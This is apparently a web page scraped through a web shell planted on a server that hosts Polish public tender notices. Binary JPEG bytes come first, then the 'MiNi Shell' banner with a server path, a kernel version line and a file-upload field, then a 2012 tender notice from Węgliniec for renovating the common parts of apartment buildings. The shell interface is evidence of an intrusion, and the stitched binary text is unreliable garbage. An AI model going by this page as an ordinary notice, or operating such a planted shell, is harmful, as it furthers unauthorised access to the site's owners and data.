JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120217/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120217/49014-N-2012.html

<p class="kh_header"><b>Węgliniec: Renowacja części wspólnych wielorodzinnych budynków mieszkalnych 
w centrum Węglińca</b><br>
<b>Numer ogłoszenia: 49014 - 2012; data zamieszczenia: 17.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Węgliniec , ul. Sikorskiego 3, 59-940 Węgliniec, woj. dolnośląskie, tel. 075 77 11 435, faks 075 77 12 551.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wegliniec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Renowacja części wspólnych wielorodzinnych budynków mieszkalnych 
w centrum Węglińca.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Realizacja projektu polega na wykonaniu niżej wymienionych części zamówienia w systemie zaprojektuj i wybuduj:
ZADANIE 1 -  Renowacja części wspólnych budynków Wspólnoty Mieszkaniowej CZWÓRKA  położonych w Węglińcu przy ul. Sikorskiego 4 i 4a 
ZADANIE II -  Renowacja części wspólnych budynku Wspólnoty Mieszkaniowej ul. Sikorskiego 16 w Węglińcu 
ZADANIE III -  Renowacja części wspólnych budynku Wspólnoty Mieszkaniowej Węgliniec ul. Sikorskiego 30 w Węglińcu 
ZADANIE IV -  Renowacja części wspólnych budynku Wspólnoty Mieszkaniowej ul. Sikorskiego 32 w Węglińcu 
ZADANIE V -  Renowacja części wspólnych budynku Wspólnoty Mieszkaniowej Węgliniec  Sikorskiego 36 w Węglińcu 
ZADANIE VI -  Renowacja części wspólnych budynku Wspólnoty Mieszkaniowej ul. Sikorskiego 42 Węgliniec 
ZADANIE VII -  Renowacja części wspólnych budynku Wspólnoty Mieszkaniowej ul. Karola Wojtyły 7 w Węglińcu 
ZADANIE VIII -  Renowacja części wspólnych budynku Wspólnoty Mieszkaniowej ul. Karola Wojtyły 13 w Węglińcu 
ZADANIE IX - Renowacja części wspólnych budynku Wspólnoty Mieszkaniowej Węgliniec ul. Karola Wojtyły 27 w Węglińcu oraz Wspólnoty Mieszkaniowej K.Wojtyły 29 Węgliniec.
ZADANIE X - Renowacja części wspólnych budynku Wspólnoty Mieszkaniowej Węgliniec - Kolejowa 4
ZADANIE XI - Renowacja części wspólnych budynku Wspólnoty Mieszkaniowej ul. Kolejowa 10 Węgliniec
ZADANIE XII - Renowacja części wspólnych budynku Wspólnoty Mieszkaniowej ul. Wojska Polskiego 11 w Węglińcu.
ZADANIE XIII - Renowacja części wspólnych budynku Wspólnoty Mieszkaniowej ul. W. Polskiego 12 w Węglińcu.
W każdym zadaniu zamówienie jest realizowane w dwóch etapach: 
Etap I:
- opracowanie dokumentacji projektowej stanowiącej załącznik do Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę oraz przedłożenie jej Zamawiającemu do zatwierdzenia wraz ze szczegółowym opisem robót uwzględniającym zapisy PFU i niniejszej SIWZ w terminie 30 dni od dnia podpisania umowy
UWAGA! Budynki sa położone w strefie ochrony konserwatorskiej lub ujete w ewidencji zabytków w związku z tym Wykonawca powinien uzgodnić sposób realizacji zadania z Wojewódzkim Urzędem Ochrony Zabytków.
- dokonanie Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę wraz z kompletem dokumentów - wzór zgłoszenia stanowi załącznik nr 3 do niniejszej specyfikacji.
Zamawiający dysponuje Wypisem i wyrysem z ustaleń miejscowego planu zagospodarowania przestrzennego oraz Mapą sytuacyjno-wysokościową w skali 1:500. 
Zamawiający dostarczy Oświadczenie o posiadanym prawie do dysponowania nieruchomością na cele budowlane.
Wartość I etapu nie może przekroczyć 4% ogólnej wartości przedmiotu zamówienia. 
Etap II - wykonanie robót budowlanych zgodnie z dokumentacją oraz warunkami określonymi w opinii ornitologicznej oraz opinii chiropterologicznej. Opinie te stanowią załącznik nr 2 do niniejszej specyfikacji. 
UWAGA! Koszty konsultacji ornitologicznej ponosi Zamawiający. Koszty konsultacji chiropterologicznej ponosi Wykonawca. 
Do obowiązków Wykonawcy należeć będzie (dotyczy wszystkich zadań) 
1. Wykonanie przedmiotu zamówienia przy użyciu:
1.1.własnych materiałów, zgodnie z posiadanym przez Zamawiającego programem funkcjonalno - użytkowym, ustaleń z Zamawiającym oraz Wojewódzkim Urzędem Ochrony Zabytków. Zastosowane materiały winny spełniać wymogi prawa budowlanego, tj. posiadać odpowiednie certyfikaty na znak bezpieczeństwa, być zgodne z wymogami technicznymi Polskich Norm lub aprobatą techniczną, o ile dla danego wyrobu nie ustanowiono Polskiej Normy; wymagane są materiały atestowane i dopuszczone do stosowania,
1.2.rusztowań i wszelkiego rodzaju sprzętu, narzędzi i urządzeń koniecznych do użycia w trakcie realizacji przedmiotu zamówienia,
2. Zgłaszanie inspektorowi nadzoru do odbioru robót ulegających zakryciu lub zanikających.
3. Ponoszenie wszelkich kosztów związanych z:
3.1.uzyskaniem niezbędnych opinii, uzgodnień, zatwierdzeń, pozwoleń (dotyczących zarówno opracowania dokumentacji projektowej jak i wykonywania robót budowlanych, wykonaniem niezbędnych prób, badań, sprawdzeń, itd. )  
3.2.koszty robót przygotowawczych zgodnie z art. 41 prawa budowlanego (Dz.U.2010.243.1623 ze zm.) 
3.3.koszty związane z ogrodzeniem terenu budowy, zajęciem pasa drogowego, oznakowaniem terenu budowy,
3.4.koszty związane z zagospodarowaniem placu budowy, utrzymaniem zaplecza budowy (naprawy, doprowadzenie wody, energii elektrycznej, dozorowanie, itp.)
4.Zabezpieczenie na terenie budowy należytego ładu, porządku, przestrzeganie przepisów BHP, ochrona znajdujących się na terenie urządzeń i sprzętu oraz utrzymanie ich w należytym stanie technicznym. Roboty budowlane będą wykonywane w sposób nie powodujący kolizji
z funkcjonowaniem sąsiednich obiektów. 
5.Uzgodnienie i potwierdzenie dokumentami ilości i właściwej utylizacji zdemontowanych materiałów, powstających w trakcie  wykonywania robót budowlanych gruzu, odpadów oraz materiałów - dokumenty potwierdzające ich właściwe zagospodarowanie (kwity potwierdzające złożenie ich na właściwych składowiskach)
6.Pełna odpowiedzialność za szkody wynikłe na terenie budowy w trakcie realizacji robót,
7. Naprawa na swój koszt urządzeń podziemnych uszkodzonych podczas wykonywania robót oraz przywróceniem terenu do stanu pierwotnego. 
8. Wykonawca zobowiązany jest prowadzić roboty w taki sposób by nie wpływały one negatywnie na konstrukcję sąsiednich budynków oraz pogorszenie ich stanu technicznego. W przypadku uszkodzenia jakichkolwiek elementów lub konstrukcji sąsiednich budynków, Wykonawca zobowiązany będzie na swój koszt zlikwidować powstałe na skutek jego działań szkody.  
9. Wykonawca zobowiązany jest do zorganizowania (wydzielenia) terenu budowy w taki sposób aby zapewnić niezbędną powierzchnię terenu dla obsługi istniejących budynków mieszkalnych.
10. Zamawiający nie przewiduje wypłaty odszkodowań użytkownikom terenu za szkody zawinione przez Wykonawcę, powstałe podczas prac związanych z budową. Na Wykonawcy ciąży obowiązek dokonywania uzgodnień z użytkownikami obiektów dotyczących wejścia z robotami,  minimalizacji szkód lub zakresu robót oraz ponoszenia kosztów z tym  związanych.
11.Ubezpieczenie: 
11.1.Wykonawca zobowiązany jest do zawarcia umów ubezpieczeniowych z tytułu szkód, które mogą zaistnieć w związku z określonymi zdarzeniami losowymi oraz od odpowiedzialności cywilnej w okresie od dnia rozpoczęcia robót do ich odbioru. 
11.2.Ubezpieczeniu podlegają w szczególności: - roboty, urządzenia oraz wszelkie mienie ruchome związane bezpośrednio z wykonywaniem robót, w tym sprzęt, materiały i urządzenia przeznaczone do wbudowania - odpowiedzialność za szkody oraz następstwa nieszczęśliwych wypadków dotyczących pracowników i osób trzecich, a powstałych w związku z prowadzonymi robotami budowlanymi, w tym także ruchem pojazdów mechanicznych. 
12. Zgłoszenie obiektu do odbioru końcowego oraz uczestniczenie w czynnościach odbioru, a także niezwłocznego usunięcia stwierdzonych wad i usterek, 
13.Doprowadzenie do należytego stanu i porządku terenu budowy w terminie nie późniejszym niż w dniu odbioru końcowego robót, 
Dodatkowe wymagania Zamawiającego:
1.Wykonawca ma obowiązek zapoznania się w sposób bardzo szczegółowy z dokumentacją przetargową. Wykonawca ma obowiązek wyjaśnić z Zamawiającym wszystkie wątpliwości w stosunku do zakresu robót, przed złożeniem ofert. Po złożeniu oferty, Zamawiający będzie uważał, że Wykonawca nie ma wątpliwości i uwag w stosunku do zakresu ujętego w specyfikacji. Zamawiający wymaga, aby Wykonawca dokonał wizji lokalnej i zapoznał się w sposób szczegółowy ze stanem istniejącym, placem budowy i jego otoczeniem. Wątpliwości wynikające z wizji lokalnej, wykonawca musi wyjaśnić z Zamawiającym przed złożeniem oferty. Zaniechanie wizji lokalnej przez Wykonawcę następuje na jego ryzyko i odpowiedzialność.
2. Z uwagi na fakt, iż przedmiot zamówienia jest współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego  w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013, Priorytet IX Odnowa zdegradowanych obszarów miejskich na terenie Dolnego Śląska (Miasta) Działanie 9.2 Wsparcie dla przedsięwzięć w zakresie mieszkalnictwa w miastach poniżej 10 tysięcy mieszkańców, Zamawiający związany jest datą zakończenia finansowego realizacji Projektu. W przypadku uchybienia temu terminowi utraci pozyskane środki z dofinansowania. W takim przypadku Zamawiający dochodzić będzie od Wykonawcy odszkodowania uzupełniającego do wysokości rzeczywiście poniesionej szkody obejmujące utratę tego właśnie dofinansowania.
Ustala się następujące warunki płatności.
1.1. Podstawą rozliczenia jest wynagrodzenie ryczałtowe, obliczone przez Wykonawcę na podstawie kosztorysu ofertowego załączonego do oferty.  
1.2. Wartość robót budowlanych nie może zostać podwyższona w drodze aneksu  do niniejszej Umowy. Wartość całkowita przedmiotu umowy ani ceny nie będą waloryzowane w okresie realizacji umowy
1.3. Należne wykonawcy wynagrodzenie będzie płatne po zakończeniu każdego etapu robót i podpisaniu protokołu bezusterkowego odbioru końcowego wykonanych robót. 
1.4. Płatność za fakturę VAT będzie dokonana przelewem z konta Zamawiającego na konto Wykonawcy w terminie 30 dni od daty dostarczenia faktury VAT do siedziby Zamawiającego.
Zamawiający nie zamierza zawierać umowy ramowej.
Zamawiający dopuszcza odbiory częściowe. 
Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.
Wymagany okres rękojmi i gwarancji na wykonane roboty wynosi 60 miesięcy na roboty dekarskie oraz 36 miesięcy dla pozostałych robót licząc od dnia odebrania przez Zamawiającego robót budowlanych i podpisania (bez uwag) protokołu końcowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających zgodnie z art. 67 ust.1 pkt 6 ustawy Prawo zamówień publicznych do 50% wartości zamówienia podstawowego. Zakres zamówień uzupełniających może obejmować wykonanie roboty tego samego rodzaju - odpowiednio dla każdej części zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.40-4, 71.32.00.00-7, 45.32.00.00-6, 45.33.00.00-9, 45.40.00.00-1, 45.26.26.90-4, 45.45.00.00-6, 45.44.21.00-8, 45.23.32.29-0, 45.31.12.00-2, 45.26.10.00-4, 45.31.56.00-4, 45.42.11.00-5, 45.45.31.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się doświadczeniem zawodowym w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w wykonaniu co najmniej jednego zamówienia obejmującego zaprojektowanie i wykonanie robót konstrukcyjno - budowlanych na jednym budynku mieszkalnym, przy czym wartość tych robót nie może być mniejsza niż 50.000,00 zł (brutto).
Za wykonane zamówienie Zamawiający rozumie takie, w którym przedmiot umowy został wykonany zgodnie z zasadami sztuki budowlanej i prawidłowo ukończony. 
W przypadku oferty składanej wspólnie przez kilku Wykonawców, co najmniej jeden z Wykonawców musi spełniać warunek.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować osobami:
1. minimum jedną osobą z uprawnieniami budowlanymi do projektowania
w specjalności konstrukcyjno - budowlanej bez ograniczeń
w rozumieniu § 17 ust. 1 rozporządzenia  Ministra Transportu
i Budownictwa z dnia 28 kwietnia 2006r. w sprawie samodzielnych  funkcji technicznych w budownictwie (Dz. U. z 2006r. nr 83,  poz.578 z późn. zm.), która uczestniczyła w opracowaniu minimum jednej dokumentacji projektowej budynku o kubaturze min 500m3 przeznaczonego na stały pobyt ludzi - dotyczy Zadań I-XIII,
2. minimum jedną osobą z uprawnieniami budowlanymi do projektowania
w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń w rozumieniu § 24 ust. 1, cytowanego wyżej  rozporządzenia, która uczestniczyła w opracowaniu minimum jednej dokumentacji projektowej budynku
o kubaturze min 500m3 przeznaczonego na stały pobyt ludzi - dotyczy Zadań II - VII oraz X, XI, XIII.
3. minimum jedną osobą z uprawnieniami budowlanymi do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń w rozumieniu § 23 ust. 1, cytowanego wyżej rozporządzenia. która uczestniczyła w opracowaniu minimum jednej dokumentacji projektowej budynku o kubaturze min 500m3 przeznaczonego na stały pobyt ludzi - dotyczy Zadania IV,   
4. minimum jedną osobą posiadającą uprawnienia do pełnienia funkcji technicznych w budownictwie tj. do kierowania robotami budowlanymi w specjalności konstrukcyjno  - budowlanej bez ograniczeń w rozumieniu § 17 ust. 1 rozporządzenia Ministra Transportu
i Budownictwa z dnia 28 kwietnia 2006r. W sprawie samodzielnych funkcji  technicznych w budownictwie (Dz.U z 2006r. nr 83, poz.578 z późn. zm.), która pełniła  funkcję  kierownika robót bądź kierownika budowy budynku o kubaturze min 500m3 przeznaczonego na stały pobyt ludzi  - dotyczy Zadań I-XIII,
5. minimum jedną osobą posiadającą uprawnienia do pełnienia funkcji technicznych w budownictwie tj. do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń w rozumieniu § 24 ust. 1, cytowanego wyżej rozporządzenia, która pełniła  funkcję  kierownika robót bądź kierownika budowy budynku o kubaturze min 500m3 przeznaczonego na stały pobyt ludzi - dotyczy Zadania II - VII oraz X, XI, XIII,
6. minimum jedną osobą posiadającą uprawnienia do pełnienia funkcji technicznych w budownictwie tj. do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń w rozumieniu § 23 ust.1, cytowanego wyżej rozporządzenia, która pełniła  funkcję  kierownika robót bądź kierownika budowy budynku o kubaturze min 500m3 przeznaczonego na stały pobyt ludzi - dotyczy Zadania IV. 
Zamawiający dopuszcza wskazanie kilku osób, których łączny zakres uprawnień będzie obejmował specjalności wymienione w rozumieniu § 23 ust. 1, cytowanego wyżej rozporządzenia.
Zamawiający uzna odpowiadające wyżej wymienionym i ważne uprawnienia budowlane  wydane na podstawie wcześniej obowiązujących przepisów, jeżeli będą potwierdzać  nieograniczony zakres.
 W przypadku oferty składanej wspólnie przez kilku Wykonawców, warunek Wykonawcy mogą spełniać łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie do umowy zmian w drodze aneksu, poprzedzonych pisemnym umotywowanym wnioskiem strony zainteresowanej wprowadzeniem wnioskowanych zmian z uwzględnieniem warunków ich wprowadzenia:
1. Dopuszczalna jest zmiana wynagrodzenia wykonawcy:
1.1. w przypadku zmiany w okresie obowiązywania umowy stawki podatku VAT, wynagrodzenie brutto ulegnie zmianie stosownie do zmiany tej stawki, przy czym wynagrodzenie netto pozostaje bez zmian;
1.2. zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, 
2.Wykonawca może wnioskować o dokonanie zmiany osoby posiadającej stosowne uprawnienia w następujących przypadkach:
2.1.  śmierci, choroby lub innego zdarzenia losowego uniemożliwiającego pełnienie funkcji,
2.2. Zamawiający ma prawo żądać od Wykonawcy zmiany konkretnej osoby spośród personelu kluczowego, jeśli uzna, że nie spełnia ona w sposób należyty obowiązków wynikających z umowy.
W przypadku zmiany określonej w pkt 2. lit.a i b, nowa osoba musi spełniać wymagania określone w specyfikacji istotnych warunków zamówienia. 
3. Zamawiający może zmienić termin realizacji przedmiotu umowy w przypadku:
3.1. zawieszenia robót budowlanych przez Zamawiającego,
3.2. wykopalisk uniemożliwiających wykonywanie robót budowlanych,
3.3. zmian dokumentacji projektowej, dokonywanych na wniosek Zamawiającego lub zgłaszanych i zaakceptowanych przez Zamawiającego,
3.4. zmian dokonanych na podstawie art. 23 pkt 1 ustawy Prawo budowlane -  zmiana rozwiązaniach projektowych - jeżeli są one uzasadnione koniecznością zwiększenia bezpieczeństwa realizacji robót budowlanych lub usprawnienia procesu budowy;
3.5. wystąpienia niekorzystnych warunków atmosferycznych uniemożliwiających prowadzenie prac,
3.6.	 zmian terminów wynikających z umowy o dofinansowanie;
3.7.	zlecenia Wykonawcy robót budowlanych lub innemu podmiotowi wykonania robót budowlanych dodatkowych w rozumieniu przepisu art. 67 Ustawy.
4.Termin wykonania umowy może zostać wydłużony maksymalnie o czas opóźnienia spowodowanego okolicznościami określonymi w pkt 3.
5.Wykonawca może wnioskować o zmianę harmonogramu rzeczowo - finansowego, w przypadku wystąpienia okoliczności mających wpływ na przebieg i tempo ich wykonania w stosunku do pierwotnie zakładanych.
6.Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy:
6.1.Ustalenie przy podpisaniu umowy lub w drodze aneksu do niej terminów wykonywania poszczególnych czynności objętych zakresem rzeczowym przedmiotu umowy;
